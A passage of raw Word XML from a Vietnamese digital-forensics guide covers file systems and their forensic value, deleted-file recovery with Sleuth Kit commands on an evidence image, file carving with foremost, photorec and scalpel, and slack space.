      <w:tr w14:paraId="31B514C2">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2F18602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GPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0507308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Chuẩn hiện đại dùng với UEFI, hỗ trợ nhiều phân vùng và dung lượng rất lớn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="20"/>
    </w:tbl>
    <w:p w14:paraId="604DA152">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="các-hệ-thống-tệp-quan-trọng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.2. Các hệ thống tệp quan trọng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="8306"/>
      </w:tblGrid>
      <w:tr w14:paraId="6E6D3772">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7E5566F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Hệ thống tệp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081FCF8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Giá trị pháp chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="64C1F56A">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528C065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NTFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FD9DCE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 xml:space="preserve">Chuẩn Windows; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>$MFT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> chứa metadata của mọi tệp và tạo ra nhiều artefact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7869BCFA">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1B94D6E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FAT32/exFAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="348598C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Thường gặp trên USB và thẻ nhớ; không journaling, cấu trúc đơn giản, phục hồi dễ hơn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5770ECB0">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79AF024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ext4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62373C9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Chuẩn Linux; journal lưu dấu thay đổi gần đây và inode chứa metadata chi tiết.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="679EFBDB">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2605838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APFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63B89D5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Định dạng Apple hiện đại, copy-on-write, snapshot và mã hóa tích hợp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39548282">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FFB960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HFS+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0682561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Định dạng Apple cũ, có resource fork và kho metadata Spotlight.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3FCBCDE2">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22EC995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Btrfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5221466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Copy-on-write, snapshot và kiểm tra toàn vẹn; ngày càng phổ biến trên máy chủ Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2F3B6501">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74961A2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XFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36F6419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Hệ thống tệp 64-bit hiệu năng cao, thường gặp trên RHEL/CentOS, có journaling tốt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="365F549F">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077A042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FAT12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6760CCA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Định dạng rất cũ trên đĩa mềm và một số thiết bị nhúng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="21"/>
    </w:tbl>
    <w:p w14:paraId="3BB30770">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="xóa-thực-sự-có-nghĩa-gì"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.3. “Xóa” thực sự có nghĩa gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129B2E0">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Trên phần lớn hệ thống tệp, khi tệp bị xóa, các byte dữ liệu không bị xóa ngay. Mục thư mục bị loại bỏ và vùng lưu trữ được đánh dấu “có thể tái sử dụng”. Dữ liệu còn tồn tại đến khi bị tệp mới ghi đè.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487AC71">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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Xem bảng phân vùng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mmls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidence.E01</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Liệt kê tệp, kể cả tệp đã xóa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fls</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-r</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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2048 evidence.E01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'d/d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>head</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-20</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Phục hồi theo inode/MFT entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>icat</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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2048 evidence.E01 43201 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> recovered_exfil.7z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sha256sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> recovered_exfil.7z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2AF29">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Ví dụ phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB056D">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Users/suspect/Desktop/secrets.zip        [DELETED]</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Users/suspect/Documents/plan.docx        [DELETED]</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Users/suspect/AppData/Temp/exfil.7z      [DELETED]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:p w14:paraId="0C3751ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="X63ddcc21709241bf56525d9d6673616446f7be7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.4. File carving - phục hồi không cần metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B035E7E">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File carving phục hồi tệp từ vùng chưa cấp phát chỉ dựa vào chữ ký tệp (magic bytes), không cần metadata của hệ thống tệp. Kỹ thuật này hữu ích khi metadata đã bị ghi đè hoặc khi phân tích không gian đĩa thô.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BBB76E">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>foremost</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-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> jpeg,pdf,zip,docx,xlsx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidence.E01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> carved/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>photorec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /d photorec/ evidence.E01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>scalpel</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-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/scalpel/scalpel.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> scalpel/ evidence.E01</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:p w14:paraId="07793B97">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="vùng-dư---slack-space"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4.5. Vùng dư - Slack Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCBE857">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Slack space là phần còn lại từ cuối dữ liệu của tệp đến cuối cluster cuối cùng được cấp. Ví dụ, tệp 1000 byte trong cluster 4096 byte để lại 3096 byte vùng dư. Khu vực này có thể chứa mảnh dữ liệu cũ, nội dung email hoặc phần hình ảnh đã bị ghi đè.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA40D3A">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Chứng cứ quan trọng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hãy kiểm tra slack space trong các vụ nghi ngờ che giấu dữ liệu hoặc khi tệp có dấu hiệu bị cắt ngắn có chủ đích.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkEnd w:id="24"/>
    <w:p w14:paraId="546F30FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="dấu-vết-pháp-chứng-trên-windows"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5. Dấu vết pháp chứng trên Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72623C9F">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
